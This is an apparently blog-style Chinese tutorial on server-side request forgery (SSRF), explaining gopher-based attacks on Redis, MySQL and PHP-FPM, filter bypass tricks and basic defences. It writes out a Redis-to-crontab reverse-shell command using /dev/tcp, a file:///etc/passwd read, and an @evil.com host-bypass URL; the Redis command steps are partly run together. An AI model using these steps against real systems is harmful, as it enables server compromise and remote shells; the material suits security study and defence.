SSRF漏洞分析和防御

简介

  服务端伪造请求(server side request forgery)是一种通过构造数据进而伪造服务器发起请求的漏洞。

  请求是由内部发起，一般SSRF漏洞攻击的目标往往是从内网无法访问的内部系统。由攻击者构造的攻击链接传给服务端执行造成的漏洞，

  XSS是利用客户端发起请求；SSRF是利用服务器发起请求。

存在场景

  SSRF漏洞一般出现在有调用外部资源的场景中，如社交服务分享功能、图片识别服务、网站采集服务、远程资源请求（wordpress xmlrpc.php）、文件处理服务（XML解析）等。

SSRF漏洞测试
尝试是否能控制、支持常见的协议
file:// 从文件系统中读取文件内容

eg:file:///etc/passwd

dict:// 字典服务器协议，让客户端能够访问更多字典源，可以获取目标服务器上运行的服务版本等信息。

dict://ip:6739/info (redis)

gopher:// 分布式的文档传递服务。

SSRF利用

一、使用Gopher协议扩展攻击面
1. 攻击Redis(是key-values存储系统，是跨平台的非关系数据库 详细->菜鸟教程)
redis支持五种数据类型：string（字符串），hash（哈希），list（列表），set（集合）及zset(sorted set：有序集合)（一般运行于内网，使用者大多将其绑定于127.0.0.1:6379）

redis-cli //连接redis服务 加上–raw解决中文乱码
redis-cli -h host -p port -a password //远程登陆
一般通过写入crontab反弹shell
(注：Linux crontab是用来定期执行程序的命令，crond 命令每分锺会定期检查是否有要执行的工作，如果有要执行的工作便会自动执行该工作。)

攻击流程：
	1、redis-cli flushall
	2、echo -e "\n\n*/1 * * * * bash -i /dev/tcp/172.28.0.3/1234 0>&1\n\n" | redis-cli -x set 1 redis-cli config set dir /var/spool/cron/   
	(指定shell为bash，编辑contab文件的内容任务，
	每一分钟编辑-e后面的指令，蓝色redis设置键值，
	把反弹shell写入配置文件)
	3、redis-cli config set dbfilename root
	4、redis-cli save
	5、 然后将全部数据转换成Gopher协议的URL。
	最后数据需要在urlencode编码一次

（自动组装Gopher Gopherus）
最后数据需要在urlencode编码一次
二、攻击MYSQL
MYSQL客户端连接服务端方式有4种，UNIX套接字，内存共享，命名管道，TCP/IP套接字
攻击流程举例：
a. 使用tcpdump -i lo port 3306 -w /pcap/mysql.pcap抓包
b. 用户登录MYSQL正常操作
c. 利用wireshark打开mysql.pcap,导出客户端到服务端的数据
d. 进行URL编码构造gopher协议
e. Payload ：页面URL/?url=gopher://本地ip:port/_数据包需要在urlencode编码一次

三、PHP-FPM攻击
PHP-FPM是实现和管理FastCGI的进程。通信可分为两种：TCP和UNIX套接字。
TCP模式是本机上监听一个端口，默认端口号9000,Nginx会把客户端数据通过FastCGI协议传给9000端口，PHP-FPM拿到数据后会调用CGI进程进行解析。

Nginx配置文件如下:

Location ~ \.php${
	Index index.php index.html index.htm;  

PHP-FPM配置文件：

listen=127.0.0.1:9000
	Include /etc/nginx/fastcgi_params;
	Fastcgi_pass 127.0.0.1:9000;
	Fastcgi_index index.php;
	Include fastcgi_params;
	}

通过伪造FastCGI协议包实现PHP任意代码执行。FastCGI协议只可以传输配置信息，需要被执行的文件名及客户端传进来的GET，POST，cookie等数据，然后通过更改配置信息来执行任意代码。
php://ini中有两个非常有用的配置项

a. auto_prepend_file:
在执行目标文件前，先包含auto_prepend_file中指定的文件，并且可以使用伪协议如php://input(php://input是客户端HTTP请求中POST的原始数据，如果将auto_prepend_file设定为php://input，那么每个文件执行前都会包含POST的数据，前提需要开启allow_url_include)
b. auto_append_file:在执行目标文件后，包含auto_append_file指向的文件。
限制条件：需要知道服务器上一个PHP文件的绝对路径，且security.limit_extensions配置项的后缀必须为.php,所一一般可以使用默认的/var/www/html/index.php

攻击内网中脆弱的web应用
将http数据包改为gopher协议的URL，执行command=uname -a

SSRF绕过

1. IP限制
使用Enclosed alphanumerics代替IP中的数字或网址中的字母。

ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> http://example.com

参考：封闭式字母数字

用句号代替点

127。0。0。1 >>> 127.0.0.1

将IP地址转换进制
使用正则表达式过滤属于内网的IP地址，可绕过
十六进制前需加0x,八进制加0。
IP地址简写：
127.0.0.1写法：

ip地址中间的0可省略。
linux下 0代表127.0.0.1
windows下0代表0.0.0.0
127.0.0.1 -> 127.1
http://0

2. DNS 重绑定
3. 302跳转
xip.io服务类似DNS重绑定
127.0.0.1.xip.io解析成127.0.0.1，访问服务任意子域名都会重定向到子域名。

http://10.0.0.1.xip.io = 10.0.0.1
www.10.0.0.1.xip.io= 10.0.0.1
http://mysite.10.0.0.1.xip.io = 10.0.0.1
foo.http://bar.10.0.0.1.xip.io = 10.0.0.1
10.0.0.1.xip.name resolves to 10.0.0.1
www.10.0.0.2.xip.name resolves to 10.0.0.2
foo.10.0.0.3.xip.name resolves to 10.0.0.3
bar.baz.10.0.0.4.xip.name resolves to 10.0.0.4

4、限制指定域名

http://xample.com@evil.com

URL: [协议]😕/[用户名]:[密码]@[主机名/域名/IP]:[端口号]/[路径]/[文件]?[参数]

防御

1、关闭不必要的端口，例如只开放80,443,8080,8090等
2、限制请求的协议，例如限制只能是HTTP，HTTPS
3、使用DNS缓存或者Host白名单的方式
4、设置URl白名单或者限制内网IP等。

未完待续…